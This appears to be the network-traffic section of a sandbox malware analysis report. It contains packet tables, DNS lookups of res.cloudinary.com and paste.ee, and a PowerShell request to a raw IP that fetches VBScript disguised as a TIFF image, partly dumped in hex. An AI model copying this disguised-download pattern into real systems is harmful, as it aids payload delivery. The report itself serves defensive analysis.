Dec 20, 2024 16:35:01.966763973 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.966772079 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.967101097 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.973001003 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.973018885 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.973076105 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.973083019 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.973217010 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.979633093 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.979651928 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.979820967 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.979820967 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.979829073 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.979952097 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:01.981621981 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:01.981904030 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.129632950 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.129667997 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.129988909 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.130003929 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.132616043 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.136260033 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.136280060 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.136321068 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.136332035 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.136441946 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.136441946 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.143105030 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.143134117 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.143333912 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.143333912 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.143345118 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.143526077 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.149147034 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.149166107 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.149209976 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.149219036 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.149255991 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.149255991 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.155275106 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.155297041 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.155366898 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.155378103 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.155416965 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.155416965 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.161447048 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.161465883 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.161606073 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.161617994 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.161863089 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.168071985 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.168091059 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.168165922 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.168165922 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.168176889 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.173335075 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.174247980 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.174268961 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.174361944 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.174371004 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.177397966 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.324126959 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.324162006 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.324409008 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.324424982 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.325473070 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.329339981 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.329369068 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.329730034 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.329741001 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.333352089 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.335839033 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.335865974 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.336410046 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.336427927 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.337471962 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.342394114 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.342421055 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.343353987 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.343389988 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.344293118 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.348673105 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.348710060 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.348787069 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.348815918 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.348838091 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.348941088 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.355447054 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.355475903 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.355556965 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.355573893 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.355590105 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.355962992 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.361325026 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.361344099 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.361418962 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.361445904 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.362834930 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.367583990 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.367603064 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.367679119 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.367679119 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.367696047 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.369522095 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.514894009 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.514930964 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.515005112 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.515022993 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.515034914 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.515060902 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.521749973 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.521780014 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.521889925 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.521889925 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.521904945 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.521951914 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.528000116 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.528033018 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.528074980 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.528084993 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.528114080 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.528161049 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.534749031 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.534776926 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.534872055 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.534872055 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.534898043 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.535059929 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.540774107 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.540792942 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.541316986 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.541317940 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.541331053 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.541404009 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.546895981 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.546920061 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.546961069 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.546969891 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.547009945 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.547009945 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.553428888 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.553447008 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.553539038 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.553549051 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.553746939 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.559807062 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.559824944 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.559932947 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.559946060 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.560075998 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.707603931 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.707657099 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.707693100 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.707715034 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.707743883 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.707853079 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.713921070 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.713942051 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.714009047 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.714019060 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.714040995 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.714076042 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.721139908 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.721163034 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.721249104 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.721259117 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.721271992 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.721347094 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.726535082 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.726552010 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.726665974 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.726675987 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.726738930 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.732991934 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.733020067 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.733067989 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.733077049 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.733114958 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.733194113 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.739500999 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.739525080 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.739578962 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.739588022 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.739705086 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.739705086 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.745776892 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.745821953 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.745906115 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.745914936 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.746182919 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.752402067 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.752423048 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.752507925 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.752518892 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.752651930 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.899183035 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.899243116 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.899277925 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:35:02.899292946 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.899338007 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:02.905541897 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:35:22.902986050 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:22.903054953 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:22.903145075 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:22.903729916 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:22.903755903 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.140681982 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.140918016 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:24.145056009 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:24.145065069 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.145385027 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.157305002 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:24.199330091 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.579080105 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.579133034 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.579175949 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.579214096 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.579261065 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:24.579287052 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.579297066 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:24.580971003 CET	443	49738	104.21.84.67	192.168.2.4
Dec 20, 2024 16:35:24.581056118 CET	49738	443	192.168.2.4	104.21.84.67
Dec 20, 2024 16:35:24.653454065 CET	49738	443	192.168.2.4	104.21.84.67

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:34:56.156344891 CET	60988	53	192.168.2.4	1.1.1.1
Dec 20, 2024 16:34:56.297358036 CET	53	60988	1.1.1.1	192.168.2.4
Dec 20, 2024 16:35:22.447783947 CET	52208	53	192.168.2.4	1.1.1.1
Dec 20, 2024 16:35:22.899779081 CET	53	52208	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 16:34:56.156344891 CET	192.168.2.4	1.1.1.1	0x337c	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:35:22.447783947 CET	192.168.2.4	1.1.1.1	0x2afd	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 16:34:56.297358036 CET	1.1.1.1	192.168.2.4	0x337c	No error (0)	res.cloudinary.com	cloudinary.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 16:34:56.297358036 CET	1.1.1.1	192.168.2.4	0x337c	No error (0)	cloudinary.map.fastly.net		151.101.1.137	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:34:56.297358036 CET	1.1.1.1	192.168.2.4	0x337c	No error (0)	cloudinary.map.fastly.net		151.101.193.137	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:34:56.297358036 CET	1.1.1.1	192.168.2.4	0x337c	No error (0)	cloudinary.map.fastly.net		151.101.129.137	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:34:56.297358036 CET	1.1.1.1	192.168.2.4	0x337c	No error (0)	cloudinary.map.fastly.net		151.101.65.137	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:35:22.899779081 CET	1.1.1.1	192.168.2.4	0x2afd	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:35:22.899779081 CET	1.1.1.1	192.168.2.4	0x2afd	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

res.cloudinary.com

paste.ee

57.129.55.225

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	57.129.55.225	80	7100	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:34:49.560199022 CET	354	OUT	GET /225/economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 57.129.55.225 Connection: Keep-Alive
Dec 20, 2024 16:34:50.825153112 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:34:50 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 20 Dec 2024 10:47:38 GMT ETag: "35192-629b16017a81b" Accept-Ranges: bytes Content-Length: 217490 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: 44 69 6d 20 73 68 20 27 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 73 6f 20 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 6f 72 6d 61 74 20 27 53 74 72 69 6e 67 46 6f 72 6d 61 74 74 65 72 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 66 6f 6c 64 65 72 20 77 68 65 72 65 20 74 65 73 74 20 73 75 69 74 65 20 73 63 72 69 70 74 73 20 61 72 65 20 6c 6f 63 61 74 65 64 0d 0a 44 69 6d 20 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 72 6f 6f 74 20 66 6f 6c 64 65 72 20 66 6f 72 20 74 68 69 73 20 70 72 6f 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 69 6c 74 65 72 20 27 73 74 72 69 6e 67 3a 20 66 69 6c 65 6e 61 6d 65 20 66 69 6c 74 65 72 20 66 6f 72 20 73 65 6c 65 63 74 69 6e 67 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 74 65 73 74 20 73 75 69 74 65 73 2e 0d 0a 44 69 6d 20 63 61 70 74 69 6f 6e 20 27 73 74 72 69 6e 67 3a 20 4d 73 67 42 6f 78 [TRUNCATED] Data Ascii: Dim sh 'WScript.Shell objectDim fso 'Scripting.FileSystemObjectDim format 'StringFormatter objectDim suiteFolder 'string: folder where test suite scripts are locatedDim projectFolder 'string: root folder for this projectDim suiteFilter 'string: filename filter for selecting integration test suites.Dim caption 'string: MsgBox/PopUp title bar text.Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators.Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables.Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push.Dim nextItem 'integer: current index of the prepItems array.Dim settings 'integer: controls MsgBox/PopUp behaviour.Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout.Dim flagFile 'string: filename of a temp file used by Setup.vbs.Dim versionLink 'web pag
Dec 20, 2024 16:34:50.825308084 CET	1236	IN	Data Raw: 65 20 77 69 74 68 20 76 65 72 73 69 6f 6e 20 69 6e 66 6f 0d 0a 44 69 6d 20 65 64 69 74 6f 72 20 27 64 6f 63 75 6d 65 6e 74 20 65 64 69 74 6f 72 0d 0a 44 69 6d 20 70 6f 77 65 72 73 68 65 6c 6c 20 27 66 69 6c 65 73 70 65 63 20 6f 66 20 61 20 70 77 Data Ascii: e with version infoDim editor 'document editorDim powershell 'filespec of a pwsh.exe, if available; or just "powershell"Const CreateNew = True 'for the OpenTextFile method.Const Enter = 13 'window.event.keyCode for the Enter keyConst
Dec 20, 2024 16:34:50.825321913 CET	1236	IN	Data Raw: 65 73 74 4c 61 75 6e 63 68 65 72 22 0d 0a 20 20 20 20 64 65 66 61 75 6c 74 44 6f 63 47 65 6e 73 20 3d 20 22 65 78 61 6d 70 6c 65 73 5c 47 65 6e 65 72 61 74 65 2d 74 68 65 2d 43 53 68 61 72 70 2d 64 6f 63 73 2e 76 62 73 20 7c 20 65 78 61 6d 70 6c Data Ascii: estLauncher" defaultDocGens = "examples\Generate-the-CSharp-docs.vbs \| examples\Generate-the-VBScript-docs.vbs" defaultGits = "%ProgramFiles%\Git\cmd\git-gui.exe \| %ProgramFiles%\Git\git-bash.exe \| %LocalAppData%\Programs\Git\cmd\git
Dec 20, 2024 16:34:50.825640917 CET	1236	IN	Data Raw: 20 20 20 49 66 20 2e 45 78 69 73 74 73 28 20 22 65 64 69 74 6f 72 22 20 29 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 64 69 74 6f 72 20 3d 20 2e 49 74 65 6d 28 20 22 65 64 69 74 6f 72 22 20 29 0d 0a 20 20 20 20 20 20 20 20 45 6c Data Ascii: If .Exists( "editor" ) Then editor = .Item( "editor" ) Else editor = defaultEditor End If End With prepItems = Array("" _ , "UpdatePrePushDocs" _ , "RunSetupUninstall" _
Dec 20, 2024 16:34:50.825655937 CET	896	IN	Data Raw: 6b 42 6f 78 2e 63 68 65 63 6b 65 64 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 72 65 73 70 6f 6e 73 65 20 3d 20 4d 73 67 42 6f 78 28 20 22 4f 70 65 6e 20 73 65 6c 65 63 74 65 64 20 70 72 65 2d 70 75 73 68 20 64 6f 63 73 20 66 6f 72 20 65 64 69 Data Ascii: kBox.checked Then response = MsgBox( "Open selected pre-push docs for editing?", settings, caption ) Else response = vbYes End If If vbCancel = response Then Exit Sub ElseIf vbNo = response Then A
Dec 20, 2024 16:34:50.825668097 CET	1236	IN	Data Raw: 74 49 74 65 6d 0d 0a 20 20 20 20 20 20 20 20 45 78 69 74 20 53 75 62 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 49 66 20 72 65 71 43 6f 6e 66 69 72 6d 43 68 6b 42 6f 78 2e 63 68 65 63 6b 65 64 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 Data Ascii: tItem Exit Sub End If If reqConfirmChkBox.checked Then response = MsgBox("Uninstall the VBScripting components and libraries, etc.?", settings, caption) Else response = vbYes End If If vbYes = respons
Dec 20, 2024 16:34:50.826101065 CET	1236	IN	Data Raw: 6e 69 6e 73 74 61 6c 6c 4b 65 79 20 5f 0d 0a 20 20 20 20 29 29 0d 0a 20 20 20 20 49 66 20 4e 6f 74 20 72 65 71 43 6f 6e 66 69 72 6d 43 68 6b 42 6f 78 2e 63 68 65 63 6b 65 64 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 55 6e 69 6e 73 74 61 6c 6c Data Ascii: ninstallKey _ )) If Not reqConfirmChkBox.checked Then UninstallFromProgramsAndFeatures = False Exit Function End If On Error Resume Next sh.Run sh.RegRead(key) If Err Then Un
Dec 20, 2024 16:34:50.826113939 CET	1236	IN	Data Raw: 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 49 66 20 76 62 59 65 73 20 3d 20 72 65 73 70 6f 6e 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 4b 69 6c 6c 50 72 6f 63 65 73 73 65 73 42 79 4e 61 6d 65 28 20 22 77 73 63 72 69 70 74 2e 65 78 65 22 20 Data Ascii: End If If vbYes = response Then KillProcessesByName( "wscript.exe" ) ElseIf vbCancel = response Then Exit Sub End If AwaitNextItemEnd SubSub KillProcessesByName(processName) Dim id, IDs With
